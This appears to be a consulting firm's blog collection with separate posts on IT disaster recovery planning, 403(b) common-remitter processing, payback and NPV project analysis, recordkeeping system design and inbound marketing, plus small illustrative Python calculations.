  • Nuclear
  • Active (right answer)

Which type of plan do you believe you have?  Do all members of your company have the same impression?  Incredibly, more than 44% of the companies with a workable disaster recovery plan have NOT informed anybody about the plan.  Why?  Is it because they don’t believe it will work or don’t want to take responsibility for it?  It is easy for the CEO to buy into the idea that they have done their ‘due diligence’ by spending a ton on a nuclear scheme.  But is spending a real benchmark for recovery?  In fact, some of the best recovery plans can be done quite affordably.  The key is to have an active resilience plan that is utilized on a daily basis.

It is the business…stupid.  Too often, IT staffs have discussed IT disaster recovery in terms of recovering servers rather than business value.  Which of the following should we be focusing on?

  • Backups
  • Disaster Recovery
  • Business Continuity (right answer)

The most powerful metric:  “Are you trying to avoid employee inconvenience with your requested service levels?”  IT staff are all too often the guy with the hammer looking at all problems as nails.  We forget that business was dutifully conducted before faxes, emails, ETL, and mobile phones.  What is really critical to the business?  And how can it be done in a pinch with a manual solution?  All too often the first question is how do we replicate the databases all over the planet, when the question we should be asking is:  how can we call the customers?  The real need is to establish business continuity.

We can distill the needs by looking at common terms in the recovery business.  But we cannot accept the representations of the primary users as gospel.  All users will say their functions must be 100% available at all times with no possibility of any data loss: really?  But this is seldom the truth from a core business perspective.

  • Recovery Time Objective – Time required to recover critical systems to a functional state, often assumed to be “back to normal” for those systems designated as mission critical.
  • Recovery Point Objective – Point in time to which the information has been restored when the RTO has elapsed and is dependent upon what is available from an offsite data storage location.

 

The Test

A great test is to ask the staff if they are willing to take a 10% pay decrease to build out a nuclear infrastructure.  When the decision is made personal, it is amazing the clever workarounds people are capable of.  This forces the conversation away from how to build bigger IT plants to how to achieve business continuity.

Another overlooked test is to ask the customer.  But you have to ask the customer the right way.  If you simply ask whether they want everything all the time, then the answer will be yes.  But suppose you gave your bank customer the following options:

  • Be guaranteed they can access their account 24×7, but pay fees of $200 a month (the fees are there whether advertised or not).
  • Accept strong but imperfect availability, where access may be down from time to time, but receive a credit of $400 a month in their account (yes, the swing is 2x).
Most customers will take the credit.

Some recovery experts suggest categorizing applications.  They are usually project managers or consultants looking for work.  Or we can break out a crystal ball and try to prioritize the impact.  This usually results in a massive cost (think infinity).  This approach is widely used by hardware sales agents trying to sell a nuclear gizmo.  However, this thinking is flawed in that more and more portal data is interconnected.  A portal may consume both high-priority and low-priority data.  But has your portal been tested to function WITHOUT the low-priority data?  A silo view is no longer practical because virtually everything is interconnected.

So then, should we simply replicate everything?  Well, although more and more shops technically have all of their data replicated to a DR location, it is not readily usable by applications because it is not in sync. As a result, database administrators and application specialists need to spend additional hours, sometimes days, reconciling data and rolling databases back to bring the various data components into alignment. By the time this effort is complete, the desired recovery window has long since been exceeded.

The hard part is not rebuilding the box.  The most common mistake businesses make when determining service-level requirements is trying to keep the business running as if nothing happened.  The point is not that some new cool technology like clouds and SANs are not useful, but rather that the usage needs to be designed into the application deployment.  If it is designed as an afterthought and assigned to another department, the costs will rise and the effectiveness will drop.

You have to make sure your disaster recovery plan will work with or without the internal key people who developed it. If the director in charge of financial ERP applications wrote the plan, for example, ask the business intelligence manager to test the recovery.  The biggest bottleneck to any recovery is not the applications or the data, but rather the key people who know how the proprietary tools were configured for your shop.  If a hurricane hits, your staff needs to be focused on their families, not your CRM systems.

The secrets to success

  • Build resiliency into the design – Keep the architecture simple.
  • Build before planning
  • Reverse the offsite co-location so that the primary location is remote and the recovery is local.
  • Include key vendors in the plan so that they can provide assistance.
  • Use offshore resources to validate and bring secondary sites current on a daily basis – routine failovers.
  • Make high availability the responsibility of everyone – business and IT.

 

The secrets to failure

  • Depend upon familiar local resources
  • Plan before building
  • Use complex technology that inserts more moving parts into the daily operations
  • Prepare thick complex manuals.
  • Designate a special recovery team
  • View the recovery in terms of hardware
  • Test the process annually over a 1-2 day period.
  • Forget unique needs of legacy applications.
  • Assume each application is an independent silo

Where should you spend money?  Too often, IT staffs have discussed IT disaster recovery in terms of recovering servers rather than business value.  We are all familiar with the extreme costs of moving from .99 of uptime to .9999.  But let’s say it a different way: it is easy to overspend trying to eliminate short downtimes, where the business impact is fairly low.  And we probably do not spend enough making darn sure we can avoid long-term downtimes.  Ironically, many of the nuclear solutions insert so many moving parts to make us instantly available that when they fail, we are usually down for days or weeks.  It is easy to underspend on protection from the big impacts.
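
The arithmetic behind the .99-versus-.9999 claim is worth seeing once; a few lines of Python make the point:

# The allowed downtime per year at each availability level.
HOURS_PER_YEAR = 24 * 365

for availability in (0.99, 0.999, 0.9999):
    downtime_hours = (1 - availability) * HOURS_PER_YEAR
    print(f"{availability} uptime allows {downtime_hours:.1f} hours down per year")

# prints 87.6, 8.8, and 0.9 hours respectively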

Where is too much money spent?

  • Overprotecting data that is not critical to the business’s daily needs
  • Failing to maintain disaster recovery plans
  • Testing disaster recovery plans too often
  • Overlooking the benefits of server virtualization
  • Refusing to renegotiate with disaster recovery service providers
  • Relying on technology as a silver bullet
  • Engaging a consultancy to do a detailed plan

 

How to save money?

  • Identify all of the costs
  • Determine the assumptions
  • Review the cost allocation
  • Build the recovery cost into the implementation

Clearly, the costs for distinct disaster recovery spending are trending upward.  The spend is going up because it cannot deliver the results.  When the recovery effort is assigned to a separate team or department, the right people are not bearing the costs of availability, and thus we cannot get unbiased feedback on the real needs.  As the costs for availability become baked into implementations, the costs as a separate line item evaporate.  And the overall spend is actually reduced, because it is cheaper to build it in once than to design and implement it twice.

 Thus, new implementations will bake in the appropriate resilience, making disaster recovery obsolete.  This will be the final step in the evolution of recovery.

Can recovery itself be a disaster?  Whether in a test or an actual recovery, the plan itself can be a substantial security risk.  During the process, the protected data is outside of its normal zone and subject to unexpected events as well as organized threats.  Companies go to great lengths to protect the PII (personally identifiable information) within their data centers, but overlook the issues during a recovery effort.  Some are flat out unavoidable!

  • How to get data to the facility?
  • How to recover licenses?
  • How to recover keys?
  • Where are passwords?
  • What happens to data after the test?
  • Were any data transmissions logged?

 

So as an executive, what can you do to take quick stock without hiring an expensive consultant?  Here is a handy executive checklist:

  • What constitutes a disaster?
  • Do all senior managers understand their role in the event of a disaster?
  • How will the interim business be managed?
  • How will public relations be managed?  How will staff communications be managed?
  • How will customers react?  Do they really want to pay for .9999?
  • What are the core business deliveries?  What can be performed through alternative manual means?
  • How much will downtime affect the share price and market confidence?
  • How will the recovery effort be staffed?
  • What is the resiliency of the solutions purchased?
  • What is the PII exposure during a recovery effort?

  

A checklist to see what you learned

1) Organizations should lay out a five-year plan with a recovery time objective that is ________
a. Less than two hours
b. Going to improve over time
c. The same as what you have now

2) Of the 50% to 70% of organizations that develop IT disaster recovery plans, fewer than ____ actually test those plans.
a. One quarter
b. One third
c. One half

3) 44% of disaster recovery planners polled haven’t told anybody that a DR plan exists in their organization.
True
False

4) How do current budget constraints change IT disaster recovery discussions with other parts of the business?
a. They don’t — IT should proceed as it has before.
b. It makes it more important to involve other business departments.
c. It makes it less important to involve other business departments.

5) The test of an IT disaster recovery plan came fast and furiously last year at a gas and electric company, when flood waters swept over its Cedar Rapids, Iowa, territory. What technology, not touted as a big piece of the IT disaster recovery plan, came to the rescue?
a. Voice over Internet Protocol
b. Desktop virtualization
c. Duplication services

6) The recession is putting a squeeze on budgets for outsourcing disaster recovery services. As such, CIOs are turning to _________ to reduce floor space at their leased recovery sites, according to providers of IT disaster recovery services.
a. Server virtualization
b. Cloud computing
c. Contract renegotiation

7) How are companies using cloud computing for IT disaster recovery outsourcing?
a. They’re increasing the number of licensees with access to DR applications.
b. They’re moving mission-critical applications to a cloud environment.
c. They’re creating carbon copies of applications.

Is your common remitter for your 403(b) or 457 using Excel?


Our teachers and other non-profit employees are able to save for their retirement in 403(b) or 457 plans. These plans allow participants to pick from the widest array of investment vendors. Each vendor is a separate and distinct recordkeeper, but the total plan is rolled up under the Common Remitter umbrella. The challenge is the dozens, if not hundreds, of vendors to choose from and manage.

This means the participant’s hard-earned contributions are routed through the Common Remitter, which reviews the salary deferrals and remits them to the correct vendor. This is a critical service for maintaining the plan’s compliance and reconciliation, and a good and necessary step to protect the participants’ interests. However, too many institutions are relying upon manual or antiquated processes built on Excel spreadsheets. This creates a huge opportunity for investment delays and lost money.

It is challenging to know exactly how your plan is being managed. But here are some tell-tale signs your remittances are being handled manually:

  • There is a long time delay for processing SRA changes;
  • The participant information is not accessible directly on the web;
  • There is a long time delay between deductions and the actual investment;
  • The payroll department is not using a standard electronic interface;
  • The actual deductions are not tested each payroll against the expected SRAs;
  • There are compliance surprises at the year end;
  • The employer cannot download SRA changes online with each payroll frequency;

These problems have been allowed to infect too many processes because this industry emerged very quickly and with few standards. The initial attempts at remitting were done either by local brokers or by the vendors themselves as a courtesy service. However, the level of complexity and accountability has grown dramatically in the past few years. Thus, a best practice has evolved: utilize an independent Common Remitter, unbiased by any investment product, to evaluate the transactions.

For these Common Remitters to provide cost-effective service, they must deploy a quality system to manage the end-to-end process. This cannot be done with the typical recordkeeping system. These retail retirement systems insist on posting the complete financial transaction with detail-level accounting entries. The common remitting process, however, simply needs to track and evaluate the business event, then pass it on to the system of record for final posting.

Today’s common remitting requires a very different approach. It needs a diligent workflow tracking through varying workspaces. This is not the typical imaging workflow, but an integrated workflow directly aware of the plans and participants. Even though the balances are not maintained, the administrative plan rules must be enforced for transactions.  

The best common remitter systems used by employers for managing multi-vendor investment providers for 403(b) plans function as an extension of the employer’s HR system and administer all multi-vendor benefit programs. The system allows payroll to simply manage a single deduction. Then, the remittance system handles the allocation instructions to the selected vendors. This dramatically reduces the payroll workload and complexity.

In the future, participants will enter any Salary Reduction Agreements (SRAs) directly on the common remitter website. The online process will immediately evaluate the request to ensure the vendors selected are approved and the amounts are within the plan ranges. This eliminates the most common back office processing errors. Then, the common remitter system will allow the HR system to download changes on a payroll basis in order to dramatically reduce the lag time for participant changes. This not only provides a better service to the hardworking employees, but also reduces the workload on the HR department.

Then, the HR system will update the Common Remitter with each payroll run. The payroll system will provide a standard SPARK interface; it is not efficient to require the common remitter to manually reformat local files. The standard interface will carry the participant information and the deductions. The upload will be done on the web to allow immediate validation and feedback, so the HR team can immediately fix any problems. This sometimes appears to be more work for HR, but it is actually less: any required adjustment may only be done by HR anyway, and this approach eliminates the manual iterations with the Common Remitter back office. A sketch of the upload-time validation follows.
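
Here is a minimal Python sketch of that per-payroll test of actual deductions against expected SRAs; the participant IDs, vendors, and amounts are all illustrative:

# Minimal sketch: test each actual payroll deduction against the expected
# Salary Reduction Agreement (SRA) before remitting, so discrepancies are
# caught at upload time instead of at year end.
expected_sras = {  # participant ID -> (approved vendor, per-payroll amount)
    "P-1001": ("VendorA", 200.00),
    "P-1002": ("VendorB", 150.00),
}

def validate_deduction(pid: str, vendor: str, amount: float) -> list[str]:
    errors = []
    sra = expected_sras.get(pid)
    if sra is None:
        errors.append(f"{pid}: no SRA on file")
        return errors
    approved_vendor, expected_amount = sra
    if vendor != approved_vendor:
        errors.append(f"{pid}: vendor {vendor} is not the approved {approved_vendor}")
    if abs(amount - expected_amount) > 0.01:
        errors.append(f"{pid}: deduction {amount:.2f} != expected {expected_amount:.2f}")
    return errors

print(validate_deduction("P-1001", "VendorA", 200.00))  # [] -- clean
print(validate_deduction("P-1002", "VendorB", 175.00))  # amount mismatch flagged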

After review and processing, the deductions are routed to the approved vendors. The Common Remitter will route the contribution transactions on to the vendor either in an XML SPARK format or in the native downstream record keeper format. All transactions and cash will be delivered electronically. This practice significantly reduces the risk and cost for the vendor.

Take a closer look at your Common Remitter process. If you are a participant and you see any of the warning signs, then your contributions may be manually tracked on spreadsheets. If you are on the HR team and want to reduce your ever-increasing HR effort, you need to demand that your remitting agent deploy a quality system designed for this process. In the best interest of your employees, you may need to work with your remitter to agree on a standard format. If you are a vendor and are overwhelmed with inbound files, then work with your agents to take advantage of systems which allow straight-through processing.

Follow us to see the latest developments in common remitting.

Beware of the Payback Analysis Moat Dragons


The beginning of any project is like planning to lay siege to a castle.  The business must take advantage of proven tools to evaluate the risks against the rewards.  Losing a battalion of soldiers to take a castle for only a few trinkets and beads is certainly not a sustainable model, and will likely get you killed or, far worse, fired!  The need to evaluate initiatives in business is just as critical, as the outcomes can dramatically impact the livelihoods of your team members.  The projects you approve will range from large initiatives into new lands (new products) to endeavors as simple as rebuilding the castle walls (system upgrades).  Obviously, the projects with larger spends, greater risk, and higher potential impact will require greater scrutiny than smaller projects.  The key to developing a strategy for successfully traversing the analysis drawbridges is not only to know what types of evaluation gates are available, but also to understand the moat dragons lurking beneath each gate.

 

Gathering Intelligence

The first and most important step is to gather some intelligence about your team, the environment, and of course, the enemy.  Intelligence about the future is seldom perfect unless you have a resident wizard, so be prepared to make some reasonable estimates.  The data you assemble will form the foundation of the decision process, so expect to invest more time preparing it than analyzing it.  A good white knight or PMO will assemble the following items:

  • A reasonable estimate of the initial and on-going costs to initiate, deliver, and maintain the project deliverables.  Projects often underestimate the on-going support costs because the PMO is not familiar with the business domain.
  • A reasonable projection of revenue as a result of the project deliverable.  This must be in terms of the business as a whole rather than any one department or fiefdom.  A wise PMO will avoid the temptation to use internal cross-department charges or recharacterize internal benefits as departmental “revenues”.
  • An assessment of the impact of taxation.  This will require the input of either the CFO or a local sorcerer.
  • The discount rate to account for the time value of money.  This can simply be a mutually agreed rate between the current borrowing rate and the opportunity cost of other uses.  It will not be possible to be exact, so close is sufficient.
  • Strategic directions of the business.  This requires understanding how to connect the dots to get to the business’ long-term market position.  Taking the river valley may not be cost effective in itself, but it is critical if it allows you to conquer the downstream kingdom of gold.

 

Secret Bag of Tricks

The next step is to understand the 3 most common tools available in your secret PMO bag of potions.  These mystical tools require forming a view of the evaluation period as well as the project deliverable life: these are not the same.  The most common evaluation period is 3 years, which is driven by the royal court’s bonus plans or corporate public reporting.  “We start with payback period,” says Ron Fijalkowski, CIO at Strategic Distribution Inc. in Bensalem, Pa.  “For sure, if the payback period is over 36 months, it’s not going to get approved.  But our rule of thumb is we’d like to see 24 months.” (1)  So let’s open our bag of tricks and see what we have to work with:

 

Gate 1:  Return on Investment

Return on investment (ROI) is calculated by subtracting the project costs from the benefits and then dividing by the costs.  The higher the return on the investment, the better.  The accountants show it as ROI = (total discounted benefits – total discounted costs) / total discounted costs.  However, this method does not address the rate at which the benefits are recovered; it assumes the recovery rate is level.  Thus, a project which recovers a larger share of the investment early is weighted the same as a project which recovers the investment later in the evaluation period.  A good online calculator can be found at http://www.money-zine.com/Calculators/Investment-Calculators/Payback-Calculator/
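
A quick worked example of the formula above – a minimal sketch with made-up cash flows and an assumed discount rate:

    def discounted(amounts, rate):
        """Discount a list of per-period amounts back to present value."""
        return sum(a / (1 + rate) ** t for t, a in enumerate(amounts, start=1))

    costs    = [100_000, 20_000, 20_000]   # hypothetical spend per year
    benefits = [ 30_000, 90_000, 90_000]   # hypothetical benefits per year
    rate = 0.08                            # assumed discount rate

    dc, db = discounted(costs, rate), discounted(benefits, rate)
    print(f"ROI = {(db - dc) / dc:.1%}")   # about 40% over the 3-year window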

 

 

Gate 2:  Payback Analysis

In simple terms, this is the time required for the additional booty to pay back the King for the amount spent to initiate, build, and maintain the deliverable.  A common way to show this is to plot the cumulative costs and revenue on a graph.  See the example of 2 projects (P1 and P2) with the same total spend, but very different payback rates.  The data points must show the cumulative amounts (in present dollars) and not the amounts for each period.  The intersection of the graph lines will show the payback timeframe on the X-axis.  “Payback period is the most widely used measure for evaluating potential investments.” (1)  “Payback gives you an answer that tells you a bit about the beginning stage of a project, but it doesn’t tell you much about the full lifetime of the project,” says Chris Gardner, a co-founder of iValue LLC, an IT valuation consultancy in Barrington, Ill. (1)  A sample cost benefit analysis template can be found at http://jaxworks.com/payback%20Analysis.xls
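
A minimal sketch of the calculation, using hypothetical cumulative figures for two projects with the same total spend:

    def payback_period(cumulative_costs, cumulative_benefits):
        """Return the first period where cumulative benefits cover cumulative
        costs, or None if the project never pays back inside the window."""
        for period, (c, b) in enumerate(zip(cumulative_costs, cumulative_benefits), 1):
            if b >= c:
                return period
        return None

    # Same total spend, very different payback rates
    costs = [100, 120, 140, 140]
    print(payback_period(costs, [60, 130, 160, 190]))   # 2 (early recovery)
    print(payback_period(costs, [10, 40, 120, 190]))    # 4 (late recovery)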

 

 

Gate 3:  Net Present Value

Once the King’s advisers have the data for the payback analysis, the next step is to discount it for time.  “Net present value (NPV) analysis is a method of calculating the expected net monetary gain or loss from a project by discounting all expected future cash inflows and outflows to the present point in time (4).”  The evaluation simply incorporates a declining factor for each period.  The higher the net present value, the better.  In this case, both projects (P1 and P2) have the same revenue and payback period.  However, once the booty is discounted for taxes, interest, and inflation, the revenue on Project 2 looks more attractive.  Thus, this tool takes into consideration the rate of the recovery by discounting rewards gained later in the deliverable life.  A sample template can be found at http://www.engage-consulting.biz/docs/cbatemplate.xls
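
A minimal sketch with made-up flows, showing how the discounting weighs earlier recovery more heavily even when the totals are identical:

    def npv(cash_flows, rate):
        """Net present value of per-period cash flows.  Period 0 is 'today'
        and is not discounted; later flows are divided by (1 + rate) ** t."""
        return sum(cf / (1 + rate) ** t for t, cf in enumerate(cash_flows))

    early = [-100_000, 70_000, 40_000, 20_000]   # hypothetical project flows
    late  = [-100_000, 20_000, 40_000, 70_000]   # same total, later recovery
    rate = 0.10                                  # assumed discount rate
    print(f"{npv(early, rate):,.0f}")            # about 11,700
    print(f"{npv(late, rate):,.0f}")             # about 3,800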

 

  

Payback Analysis Traps

Now that we have accepted our noble quest and understand the tools available, we must heed the warnings of the wise sage.  It is critical to know not just what the tools show, but also what they don’t show.  Many PMOs have fallen victim to the following payback analysis traps:

  • The PMO attempts to do the payback analysis within an industry and customer base they really don’t understand.  The best payback analysis is done by a core management team familiar with the business.

  • The false belief that the estimated and often intangible benefits will actually materialize with any certainty.  Don’t believe your own propaganda.  Clever estimates can usually swing the project analysis either to the good or the bad.  Spend more time validating the estimates than taking comfort in the analysis results.

  • The failure to consider big-picture revenue and the value of strategic leverage.  The analysis tools don’t consider the long-term strategic benefits for the business.  The crystal ball cannot connect the dots because it ignores financial performance after the break-even point (outside of the evaluation period).  Many times the life of the project deliverable is far more durable and will provide revenue or benefits much longer than 3 years.  The pitfall is that many companies pass on projects that would generate millions of dollars of recurring revenue over the long run simply because the immediate payback does not meet some arbitrary PMO metric.

  • The creation of fictitious fiefdoms through creative attempts to quantify internal benefits as departmental revenue.  The IT group is not a profit center.  The focus must remain on the business.

  • The models tend to give the PMO the appearance of too much power.  This can become a distraction, as the PMO is not usually familiar with the domain or the business.

  • Resting comfortably in the robes of your analysis if the project fails the tests.  A second look is often necessary to avoid having spreadsheets eclipse the bigger picture.  Many great new ideas, like storing music on thumb drives or building desktop computers in bright colors, might have failed these short-term tests.

 

As you plan your next project, whether it is charging into new lands to conquer or simply patching a few crumbling walls, the team must be comfortable using the payback analysis tools in their bag of tricks.  However, the royal PMO must take care to avoid the common pitfalls or they will be devoured by the moat dragons before they even get near the gates to the castle.

See how our consulting services can help you today.

 


 

Resources

(1)    http://www.computerworld.com/s/article/78529/ROI_Guide_Payback_Period?taxonomyId=074

(2)    http://cbdd.wsu.edu/kewlcontent/cdoutput/TR505r/page15.htm

(3)    http://www.mindtools.com/pages/article/newTED_08.htm

(4)    http://mydeskdrawer.com/projectmanagement/financial.html

(5)    http://coen.boisestate.edu/mkhanal/present.htm

(6)    http://web.ccsu.edu/business/faculty/petkovao/mis460prmgt/lectures/ch4%20fin%20analysis.htm

(7)    http://downloads.techrepublic.com.com/5138-6321-729928.html

(8)    http://jobfunctions.bnet.com/abstract.aspx?assetid=729928&node=6321&docid=313413&promo=100511

Why your recordkeeping system is costing you!


You work hard and try to put away a few dollars for retirement.  Then there are the fees the plan charges, eroding your benefits – some you see and some you don’t.  Why does it cost so much to handle a simple account?  After all, my checking account is free.  Why can’t my 401(k) be free too?

The cost nobody is talking about is buried in the system itself.  The traditional recordkeeping system was born to do a narrow set of accounting transactions. The systems were designed to be held deep in the back office as the plan was managed by a trustee or advisor. The system tracked participant balances and added contributions. The participant interactions were few, simple, and heavily reviewed by administrators. These tried and true systems were successful at processing and tracking simple accounting transactions.

But, regardless of the database or coding language, these legacy systems are driven by a history core constructed from an arbitrary technical transaction file. These are the simple accounting entries required to manage the debits and credits. The transaction constructs were designed for the expedience of programmers rather than the business because the industry was still evolving. The functionality was simple and narrow but very efficient.

However, the recordkeeping business has dramatically changed because of higher participant awareness and involvement. We now see self-direction, lifestyle portfolios, aggregate balances, ETFs, and credit card loans on the table in order to stay competitive. Participants demand to see their data in a form they can understand and interact with in meaningful life-event terms. This requires a successful administrator to engage in terms of business event packages rather than simple back office accounting transactions.

However, when the legacy system is driven by the core technical transaction construct, it is difficult and awkward for the system to understand the end-to-end process. The back office system was born to process one debit or credit at a time. In reaction, the system vendors have only 2 courses of action in the short term: wrap the accounting details with a secondary event identifier, or insert bloated middleware to attempt to trick and redefine the interactions.

If an internal wrapper is used, it does allow the system to be aware of related transactions, but it struggles to interact with upstream and downstream systems. The only transactions the wrapper can understand are the internal accounting entries. It cannot be aware of quality control steps, business interactions, or external interface dependencies. Unfortunately, in today’s recordkeeping environment, the business process always requires more than one system to service the participant. Thus, a wrapper ultimately does little to decrease the cost of ownership or improve the business’s ability to adapt to new service offerings.

The 2nd course of action is to front-end the system with bulky workflow systems or multi-tiered middleware. These workarounds are disguised as loosely coupled add-ons to make it easier to work with the aging host system. But what they inevitably insert into the process is duplication of data and/or rules. This not only makes it challenging to get to the source of truth, but also to diagnose any issues. There have been many cases of administrators acting upon the results they see in the bolt-on workaround when the actual data residing in the core accounting system tells a different story. The temptation is for these workarounds to do too much and really not understand the processing engine. This approach will provide some short-term relief, but inevitably drives the operational costs up and makes change almost impossible because of the tangled nest of code – just ask to see a process diagram in your favorite recordkeeping shop.

This explains why traditional recordkeeping systems are particularly bad at common remitting, where the principal activity is workflow.

System architects who understand the recordkeeping business recognize that the problem with today’s recordkeeping platforms is not a lack of understanding technology but a lack of understanding the business. There are no new 4 letter acronyms that can reduce the 401(k) fees for the participants. In fact, most bolt-on workarounds only increase the costs. These costs were easy to hide when the market was running high, but much more difficult in down times. Only a fresh approach to the system design can begin to provide some relief.

The system architecture must be driven by the business event or package. This must be redefined in terms of the end user rather than the software. It is not just a business service wrapping up complicated internal accounting devices, but rather an end to end process. This new comprehensive approach must include plan setup across the enterprise, contribution remittance, participant account interactions across several systems, upstream dependencies, and downstream deliverables. These key activities cannot be efficiently managed with bolt-on workarounds for things we must expect the recordkeeping system to deliver. In other words, the package must be core to the operation of the recordkeeping hub.

Each package is migrated through workspaces defined by the business flow. Packages are seldom single interactions but a series of steps. Each workspace must have a set of rules to observe and enforce. Those using the legacy systems typically have thick manual processing guides or yellow sticky notes to guide them through the maze. These are not simply status points pushed around by an external workflow, but core events managed at the heart of the business system. The package cannot be a simple wrapper or a middleware trick.
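
To make the idea concrete, here is a minimal sketch of a package migrating through workspaces; the workspace names and rules are illustrative assumptions, not a product design:

    from dataclasses import dataclass, field

    @dataclass
    class Package:
        """One business event (e.g., a contribution) moving end to end."""
        kind: str
        data: dict
        history: list = field(default_factory=list)   # audit trail

    # Each workspace carries a rule that must pass before the package
    # moves on; balances live elsewhere, but plan rules are enforced here.
    WORKSPACES = [
        ("received",  lambda p: bool(p.data.get("participant_id"))),
        ("validated", lambda p: p.data.get("amount", 0) > 0),
        ("routed",    lambda p: p.data.get("vendor") in {"Vendor A", "Vendor B"}),
    ]

    def migrate(package):
        for name, rule in WORKSPACES:
            if not rule(package):
                package.history.append(f"stopped at {name}")
                return False
            package.history.append(name)
        return True

    pkg = Package("contribution", {"participant_id": "P-123", "amount": 300.0, "vendor": "Vendor A"})
    print(migrate(pkg), pkg.history)   # True ['received', 'validated', 'routed']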

As a common history file becomes the core driver, it shows all of the packages impacting the participant. As each workspace is completed, the next generation system will update internal tables with specific data, such as plan changes, participant changes, contribution instructions, allocation instructions, or loan requests. These tables hold the specific processing results for the event, much like traditional recordkeeping. However, the cost of ownership will fall dramatically because the one system at the hub manages the package from cradle to grave.

Of course, each workspace can also update external systems such as related pension recordkeeping, common remitters, vendors, or other systems. If updates are required to a back office system, the updates are done in terms of the recordkeeping system with the expectation that the pension rules will be applied and managed by the back office system. The intention is not to trick the back office system, but rather to listen closely to it.

Throughout this process the administrator’s actions must be carefully tracked and audited. In fact, this is the only way a transaction can be secure across the enterprise. Each workspace must have a defined set of roles that can access it for review, processing, and overriding. In the traditional model, security often has to be held within multiple applications, which makes it impossible to get comprehensive enforcement of who viewed and acted upon a transaction. As security concerns and liability increase, the traditional model will become more and more expensive to work around.

The next generation system must inherently start with the business event. The system will be aware of the original plan and participant details, but expect to interact with various related systems. If you love your old legacy system, don’t worry: this paradigm doesn’t really compete with traditional recordkeeping systems. It can actually empower them. But it is time to recognize that those systems are too transactionally detailed to actually run a business, and old bulky workflow systems are too generic and image-oriented to really manage specialty business lines. The workflow must have a natural understanding of plan and participant data in order to make meaningful decisions. Thus, expect to see more and more independent systems entering the market to become the central business recordkeeping system. This gives the recordkeeper more independence to pursue new service offerings. The new game is not about simple divisions between the front and back office, but rather about how to efficiently drive the business with the fewest number of systems, letting each system do what it does best. Too many shops are dying with 5-10 systems and hundreds of painful workarounds. The new business hub systems are the answer to driving down the cost of administration while letting the legacy systems keep doing what they do best.

For more details, check out the new Common Remitter.

Inbound Marketing with Relevant Web


Integrated Inbound Marketing

It is well known that the business website is critical to generating revenue around the clock without the overhead of bricks and clerks.  But how do you attract customers to the site and keep them coming back for more?  In order to do this, you need a framework which brings to the table the best practices of inbound marketing.  This means attracting prospects through social media, building a following through social media groups, building credibility through relevant blogs, and configuring a site which is search engine friendly to get the highest possible natural listings.

 


SEO Optimization

In the past, businesses were found by hanging out a sign for passersby or by getting their name listed in the Yellow pages.  Businesses used tricks like neon lights or starting their business name with AAA to get noticed.  These tricks worked particularly well for plumbers, barbers, and bars.

Today, more and more customers are searching for services on the web with search engines.  The common search engines like Google, Yahoo, or Bing use clever algorithms to find and index websites.  The search engines crawl websites and try to determine what each site is about, then make a copy of it, and finally index it for future reference.

The search engines know that site owners often try to mislead users as to what a site is really about, so the process of inventorying the world of websites has become quite sophisticated.  How can Google™ be sure what your site is about?  The key items the search engines look for are:

  • How frequently the site is updated – current and frequently updated information is more interesting and credible.  This means you must have a CMS which allows updating on a daily basis without the overhead of recompiles or regression testing.
  • Link tags or descriptions.  It is not the picture or the content as much as the internal description used to reference it.  In fact, search engines can’t read pictures or flash.  The wording on the tag or link is more credible than the resulting content.
  • External references back to the site.  Of course, it is interesting how you describe yourself, but what other people say is far more credible.  In order to get this, a site must inspire others to talk about it on their own.  The paid link services have not proven successful, as search engines seem to be aware of bought links as opposed to inspired links.  Use your social media and blogs to get people talking.  The right blogger can indirectly reach over 7 million people in only a few days.
  • Key words.  These are the words your customers might use to describe your services or offerings.  They can often be very different from how you or a knowledgeable industry insider might describe your business.  The best approach is to start by determining what key words your competition is using.  You can choose to take them head on and fight for the center, or you might choose to promote a new angle.  As you build your content, be aware of your focused words, but don’t force them into a sentence, as it will be obvious that it is contrived and thus lose credibility.

 

In simple terms, your business must be able to rank high on the natural search results for your selected key words.  Try it often and on different search engines.  If you are not listed in the first 2 pages, you simply will not be found as people seldom go beyond the first page.  They simply expect the ‘big’ players to be listed first.  But be aware, you may not be able to ace all of the search engines, so it is best to focus on the market leader – which for now is Google.

Of course, there are paid advertisements and rankings, but these have not proven to be effective in the long term.  A huge majority of the follow-on clicks are still from the natural listings, as people find these more credible.  People always believe a word-of-mouth recommendation over an advertisement.  However, it can be worth using some paid rankings from time to time to generate a spike of activity or to test out new key words.  But you have to be ready to monitor the results closely.

 

Social Media

The primary use of social media is to attract attention and build a loyal following.  There is no better way to target specific groups and stay in touch with a target community.  Tools like Facebook™ and LinkedIn™ allow you not only to be found by specific searches, but also to target specific self-declared groups.  However, in order to attract the attention, the topic must offer something of value – it must be relevant.  The offering, in terms of advice, references, or similar, must have value to the target community.  Of course, it is great if the item of value is related to the business offering, but it is not required.  For example, information on business dress casual is interesting to those who will be going on a job interview.  However, the provider must remain keenly aware that this is a social atmosphere, and any blatant commercial pitch will likely backfire.  A good way to view the conversation is to keep it light, as if it were a friendly dinner party.  Nobody wants to hear an insurance pitch from the brother-in-law.

The goal is to draw the broader community into a dedicated group or page which has a similar focus or interest – not necessarily directly tied to your product.  This group or page is an effective way to measure your prospective customer base, get insight into their real needs, and communicate directly with them.  One of the best approaches to a group is to pose questions or solicit feedback on related topics.  The most successful topics are about the group’s common challenges rather than any specific product.  How do you research a prospective employer?  What are the challenges around the house when you are unemployed?  This will not only provide valuable insight as to what services are most desirable, but also establish your brand as the industry authority.  Most people eagerly engage with people who solicit their opinion and provide feedback showing their voice was heard.  It doesn’t have to be personal feedback; a summary response or a broadcast thank you is enough.

However, the group or page is not an effective place to deliver premium content or drive revenue.  It is best reserved for discussion and updates.  The prospects can comment without any fear of commitment.  It is like looking in a store window.  While prospects are outside, they will often compare notes with other prospects, and the business owner seldom gets to eavesdrop to the extent provided in social media.  Some businesses worry about letting their customers talk freely in public; however, even negative comments can be turned into good will if the business responds appropriately.  All too often negative comments are public, but the business response is private or edited.  In this case, both are public and in the author’s own words.  The goal is really to build curiosity into the business’ core website, and then to get prospects to come inside – where hopefully you already know what they think.  The landing page can then continue the process of converting them to registered prospects so they can get more tailored communication and maybe even some free stuff.


Blogs

Unless your business is the absolute bottom line discounter, you must build credibility for your purpose, expertise, and content.  Customers like to go to the recognized source – and will pay a premium for it.  A blog is becoming the preeminent method for achieving a broad readership and following.  These are short articles establishing a position or recommendation on a topic of interest to the target community.  These are not product advertisements or rants, but short articles usually based upon a lifetime of knowledge and experience.  They must deliver valuable content to the reader and not just refer the reader to a paid service. 

